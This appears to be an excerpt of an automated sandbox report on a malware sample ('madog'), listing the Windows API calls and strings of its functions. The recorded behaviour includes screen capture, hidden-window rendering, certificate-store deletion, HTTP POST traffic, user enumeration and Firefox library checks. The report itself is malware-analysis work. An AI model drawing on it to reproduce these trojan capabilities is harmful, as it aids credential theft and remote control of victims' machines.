Part of subcall function 0041D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041D581,?,?,00000000), ref: 0041D43F

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CertCloseStore.CRYPT32(?,00000000), ref: 0041D5EA

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041D5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00404BBC,?,00000001,00412C2A), ref: 0041D606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,00412C2A), ref: 0041D61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00412C2A), ref: 0041D62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,00412C2A), ref: 0041D632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,00412C2A), ref: 0041D63E

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004164FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00416506
bind.WS2_32(00000000,?,-0000001D), ref: 00416526
listen.WS2_32(00000000,?), ref: 00416535
closesocket.WS2_32(00000000), ref: 00416540

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004167DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 004167E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 00416804
closesocket.WS2_32(00000000), ref: 0041680F

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040EA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0040EA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040EA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0040EA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0040EA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0040EA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0040EA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0040EA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0040EAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 0040EAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040EAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040EB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040EB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0040EB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0040EB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0040EB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0040EB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0040EB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0040EB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0040EB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 0040EC10
GetIconInfo.USER32(00000000,?), ref: 0040EC25
GetCursorPos.USER32(?), ref: 0040EC33
DrawIcon.USER32(?,?,?,?), ref: 0040ED04

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 0040ED85

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

FreeLibrary.KERNEL32(00000000), ref: 0040EE9C
FreeLibrary.KERNEL32(?), ref: 0040EEA6
FreeLibrary.KERNEL32(00000000), ref: 0040EEB0

Strings

gdi32.dll, xrefs: 0040EB02
gdiplus.dll, xrefs: 0040EA25
ole32.dll, xrefs: 0040EAE5
BitBlt, xrefs: 0040EB47
GdiplusStartup, xrefs: 0040EA4B
DISPLAY, xrefs: 0040EBDE
GdipCreateBitmapFromHBITMAP, xrefs: 0040EA63
SelectObject, xrefs: 0040EB3A
CreateDCW, xrefs: 0040EB09
DeleteObject, xrefs: 0040EB54
DeleteDC, xrefs: 0040EB61
CreateCompatibleDC, xrefs: 0040EB14
GdiplusShutdown, xrefs: 0040EA56
GdipGetImageEncoders, xrefs: 0040EA8A
GdipSaveImageToStream, xrefs: 0040EA97
GetDeviceCaps, xrefs: 0040EB2D
GdipDisposeImage, xrefs: 0040EA70
CreateCompatibleBitmap, xrefs: 0040EB20
GdipGetImageEncodersSize, xrefs: 0040EA7D
CreateStreamOnHGlobal, xrefs: 0040EAEC

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004054A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 0040DCA2: GetClassNameW.USER32(76FC8F97,?,00000101), ref: 0040DCBD

GetWindowInfo.USER32(?,?), ref: 00405515
IntersectRect.USER32(?,?,-00000114), ref: 00405538
IntersectRect.USER32(?,?,-00000114), ref: 0040558E
GetDC.USER32(00000000), ref: 004055D2
CreateCompatibleDC.GDI32(00000000), ref: 004055E3
ReleaseDC.USER32(00000000,00000000), ref: 004055ED
SelectObject.GDI32(00000000,?), ref: 00405602
DeleteDC.GDI32(00000000), ref: 00405610
TlsSetValue.KERNEL32(?), ref: 0040565B
EqualRect.USER32(?,?), ref: 00405675
SaveDC.GDI32(00000000), ref: 00405680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 004056BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 004056CD
RestoreDC.GDI32(00000000,?), ref: 004056E4
SaveDC.GDI32(00000000), ref: 00405706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00405735
RestoreDC.GDI32(00000000,?), ref: 00405743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00405756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00405766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00405778
TlsSetValue.KERNEL32(00000000), ref: 00405792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 004057B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 004057CE
SelectObject.GDI32(00000000,?), ref: 004057E4
DeleteDC.GDI32(00000000), ref: 004057EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00405813

Part of subcall function 004053C7: GdiFlush.GDI32 ref: 0040541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 00405829

Strings

<, xrefs: 0040550B

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040DD09, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 205

APIs

TlsAlloc.KERNEL32(00422868,00000000,0000018C,00000000,00000000), ref: 0040DD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040DD4A
CreateEventW.KERNEL32(00422C30,00000001,00000000,?,84889912,?,00000001), ref: 0040DD74
CreateMutexW.KERNEL32(00422C30,00000000,?,18782822,?,00000001), ref: 0040DD97
CreateFileMappingW.KERNEL32(00000000,00422C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040DDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040DDD8
GetDC.USER32(00000000), ref: 0040DDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040DE15
GetDeviceCaps.GDI32(?,0000000A), ref: 0040DE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040DE32

Part of subcall function 00419959: GetDIBits.GDI32(00000000,0040DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00419991
Part of subcall function 00419959: GetDIBits.GDI32(00000000,0040DE4B,00000000,00000001,00000000,00000000,00000000), ref: 004199A7
Part of subcall function 00419959: DeleteObject.GDI32(0040DE4B), ref: 004199B4
Part of subcall function 00419959: CreateDIBSection.GDI32(00000000,00000000,00000000,00422888,?,?), ref: 00419A24
Part of subcall function 00419959: DeleteObject.GDI32(0040DE4B), ref: 00419A43

ReleaseDC.USER32(00000000,?), ref: 0040DE56

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CreateMutexW.KERNEL32(00422C30,00000000,?,1898B122,?,00000001,004228B8,?,00000102,004228A4,00422E70,00000010,?,?), ref: 0040DF00
GetDC.USER32(00000000), ref: 0040DF15
CreateCompatibleDC.GDI32(00000000), ref: 0040DF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0040DF3A
SelectObject.GDI32(00000000,00000000), ref: 0040DF4D
ReleaseDC.USER32(00000000,00000001), ref: 0040DF65

Strings

0,B, xrefs: 0040DD6E

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00411A04, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182

APIs

Part of subcall function 00417E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00417E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00411A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00411A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00411AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00411AFD

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00411B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00411B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00411BC0

Part of subcall function 004154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00415505
Part of subcall function 004154F1: GetLastError.KERNEL32 ref: 0041550F
Part of subcall function 004154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0041552F

InternetCloseHandle.WININET(00000000), ref: 00411C05
InternetCloseHandle.WININET(?), ref: 00411C0F
InternetCloseHandle.WININET(?), ref: 00411C19

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

HTTP/1.1, xrefs: 00411A98
POST, xrefs: 00411A6F
GET, xrefs: 00411A76, 00411AA1

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040E240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 0040E26A
GetMenuItemCount.USER32(00000000), ref: 0040E280
GetMenuState.USER32(00000000,00000000,00000400), ref: 0040E298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0040E2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040E2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 0040E2E2
EndMenu.USER32 ref: 0040E2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0040E302
GetSubMenu.USER32(00000000,00000000), ref: 0040E326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0040E340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0040E361
GetMenuItemID.USER32(00000000,00000000), ref: 0040E379
SendMessageW.USER32(?,00000111,?,00000000), ref: 0040E392

Part of subcall function 004054A9: GetWindowInfo.USER32(?,?), ref: 00405515
Part of subcall function 004054A9: IntersectRect.USER32(?,?,-00000114), ref: 00405538
Part of subcall function 004054A9: IntersectRect.USER32(?,?,-00000114), ref: 0040558E
Part of subcall function 004054A9: GetDC.USER32(00000000), ref: 004055D2
Part of subcall function 004054A9: CreateCompatibleDC.GDI32(00000000), ref: 004055E3
Part of subcall function 004054A9: ReleaseDC.USER32(00000000,00000000), ref: 004055ED
Part of subcall function 004054A9: SelectObject.GDI32(00000000,?), ref: 00405602
Part of subcall function 004054A9: DeleteDC.GDI32(00000000), ref: 00405610
Part of subcall function 004054A9: TlsSetValue.KERNEL32(?), ref: 0040565B
Part of subcall function 004054A9: EqualRect.USER32(?,?), ref: 00405675
Part of subcall function 004054A9: SaveDC.GDI32(00000000), ref: 00405680
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040569B
Part of subcall function 004054A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 004056BB
Part of subcall function 004054A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 004056CD
Part of subcall function 004054A9: RestoreDC.GDI32(00000000,?), ref: 004056E4
Part of subcall function 004054A9: SaveDC.GDI32(00000000), ref: 00405706
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040571C
Part of subcall function 004054A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00405735
Part of subcall function 004054A9: RestoreDC.GDI32(00000000,?), ref: 00405743
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00405756
Part of subcall function 004054A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00405766
Part of subcall function 004054A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00405778
Part of subcall function 004054A9: TlsSetValue.KERNEL32(00000000), ref: 00405792
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 004057B2
Part of subcall function 004054A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 004057CE
Part of subcall function 004054A9: SelectObject.GDI32(00000000,?), ref: 004057E4
Part of subcall function 004054A9: DeleteDC.GDI32(00000000), ref: 004057EB
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00405813
Part of subcall function 004054A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00405829

SetKeyboardState.USER32 ref: 0040E3D1
SetEvent.KERNEL32 ref: 0040E3DD

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004170A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 004170B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,004173A4,?,?,00000000,?), ref: 004170D5
GetProcAddress.KERNEL32(FCIAddFile,?,004173A4,?,?,00000000,?), ref: 004170E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,004173A4,?,?,00000000,?), ref: 004170F9
GetProcAddress.KERNEL32(FCIDestroy,?,004173A4,?,?,00000000,?), ref: 0041710B
HeapCreate.KERNEL32(00000000,00080000,00000000,004173A4,?,?,00000000,?), ref: 00417136
FreeLibrary.KERNEL32(004173A4,?,?,00000000,?), ref: 0041714B

Strings

cabinet.dll, xrefs: 004170B0
FCIDestroy, xrefs: 004170FB
FCICreate, xrefs: 004170CF
FCIAddFile, xrefs: 004170D7
FCIFlushCabinet, xrefs: 004170E9

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041C095, Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 254

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

EnterCriticalSection.KERNEL32(00423FE4), ref: 0041C0BC
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C11A

Part of subcall function 00411049: EnterCriticalSection.KERNEL32(00422AC8), ref: 00411064
Part of subcall function 00411049: LeaveCriticalSection.KERNEL32(00422AC8), ref: 004110E7
Part of subcall function 00411049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004111B2
Part of subcall function 00411049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 004113EC

LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C161

Part of subcall function 0041835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 004183B8

Part of subcall function 004182E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 0041831F

LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C2CC
EnterCriticalSection.KERNEL32(00423FE4), ref: 0041C2EB
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C34D

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C376
EnterCriticalSection.KERNEL32(00423FE4), ref: 0041C395
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C3DD

Strings

If-Modified-Since, xrefs: 0041C20F
identity, xrefs: 0041C1DF
Accept-Encoding, xrefs: 0041C1EB
?B, xrefs: 0041C0B6

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004050A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(004223AC,0000FDE9,?), ref: 0040515C

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

LeaveCriticalSection.KERNEL32(004223AC,?,000000FF), ref: 004051B7
EnterCriticalSection.KERNEL32(004223AC), ref: 004051D2
getpeername.WS2_32 ref: 0040527F

Part of subcall function 0041681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 00416840

Strings

YISQ, xrefs: 004050EF
Z\AV, xrefs: 00405248
EASV, xrefs: 00405250
\[EP, xrefs: 004050E8
YIST, xrefs: 0040523A
]QPG, xrefs: 0040522A
OMAV, xrefs: 00405232

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041D0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 0041D107
GetProcAddress.KERNEL32(00000000,?), ref: 0041D128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0041D159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0041D17C
FreeLibrary.KERNEL32(00000000), ref: 0041D1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0041D1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0041D212

Part of subcall function 00407125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00407138
Part of subcall function 00407125: PathUnquoteSpacesW.SHLWAPI(?), ref: 004071A0
Part of subcall function 00407125: ExpandEnvironmentStringsW.KERNEL32(?,0041D23A,00000104), ref: 004071AD
Part of subcall function 00407125: LocalFree.KERNEL32(?,.exe,00000000), ref: 004071C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 0041D2AB

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 004189C2: PathSkipRootW.SHLWAPI(?), ref: 004189CD
Part of subcall function 004189C2: GetFileAttributesW.KERNEL32(?,?,00000000,0041D261,?,?,?,?,?), ref: 004189F5
Part of subcall function 004189C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0041D261,?,?,?,?,?), ref: 00418A03

Part of subcall function 0041C912: LoadLibraryW.KERNEL32(?), ref: 0041C929
Part of subcall function 0041C912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D2A8), ref: 0041C955
Part of subcall function 0041C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?), ref: 0041C96C
Part of subcall function 0041C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?), ref: 0041C984
Part of subcall function 0041C912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?,00000000), ref: 0041C9A1
Part of subcall function 0041C912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?,00000000), ref: 0041CA0D

NetApiBufferFree.NETAPI32(?), ref: 0041D2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041D2E2

Part of subcall function 0041786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 004178AC
Part of subcall function 0041786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 004178B9

Strings

.exe, xrefs: 0041D1BB, 0041D267, 0041D2EE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040DF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 0040DF87
CloseHandle.KERNEL32(00000000), ref: 0040DF97
TlsFree.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFA2
CloseHandle.KERNEL32(00000000), ref: 0040DFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFBA
CloseHandle.KERNEL32(00000000), ref: 0040DFC7
SelectObject.GDI32(00000000,00000000), ref: 0040DFE1
DeleteObject.GDI32(00000000), ref: 0040DFF2
DeleteDC.GDI32(00000000), ref: 0040DFFF
CloseHandle.KERNEL32(00000000), ref: 0040E010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040E01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0040E038

Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DD9
Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DE2

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041A6AF, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 165

APIs

Part of subcall function 0041A594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0041A5F4

Part of subcall function 00411049: EnterCriticalSection.KERNEL32(00422AC8), ref: 00411064
Part of subcall function 00411049: LeaveCriticalSection.KERNEL32(00422AC8), ref: 004110E7
Part of subcall function 00411049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004111B2
Part of subcall function 00411049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 004113EC

SetLastError.KERNEL32(00002F78), ref: 0041A6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0041A762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0041A77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0041A795
EnterCriticalSection.KERNEL32(00423F24), ref: 0041A79D
LeaveCriticalSection.KERNEL32(00423F24,?), ref: 0041A853

Part of subcall function 00415048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0041506A
Part of subcall function 00415048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0041508C
Part of subcall function 00415048: InternetCloseHandle.WININET(?), ref: 00415094

Part of subcall function 00411C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 00411C81
Part of subcall function 00411C3C: CloseHandle.KERNEL32(?), ref: 00411C9A

EnterCriticalSection.KERNEL32(00423F24), ref: 0041A87A
LeaveCriticalSection.KERNEL32(00423F24,?), ref: 0041A8BA

Part of subcall function 00419C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00423F24,0041A893,?), ref: 00419CB1

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

$?B, xrefs: 0041A797
$?B, xrefs: 0041A85B

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00411F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(00423FB4,00000000,76C61857,00000000), ref: 00411FAF
InitializeCriticalSection.KERNEL32(00422AC8), ref: 00411FE4

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00412029
CloseHandle.KERNEL32(00000000), ref: 0041203A

Part of subcall function 00419D6D: InitializeCriticalSection.KERNEL32(00423F24,00000000,7718F8FF), ref: 00419D8F
Part of subcall function 00419D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 00419E63

Part of subcall function 0041B4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0041B4F0

InitializeCriticalSection.KERNEL32(004223AC), ref: 00412081

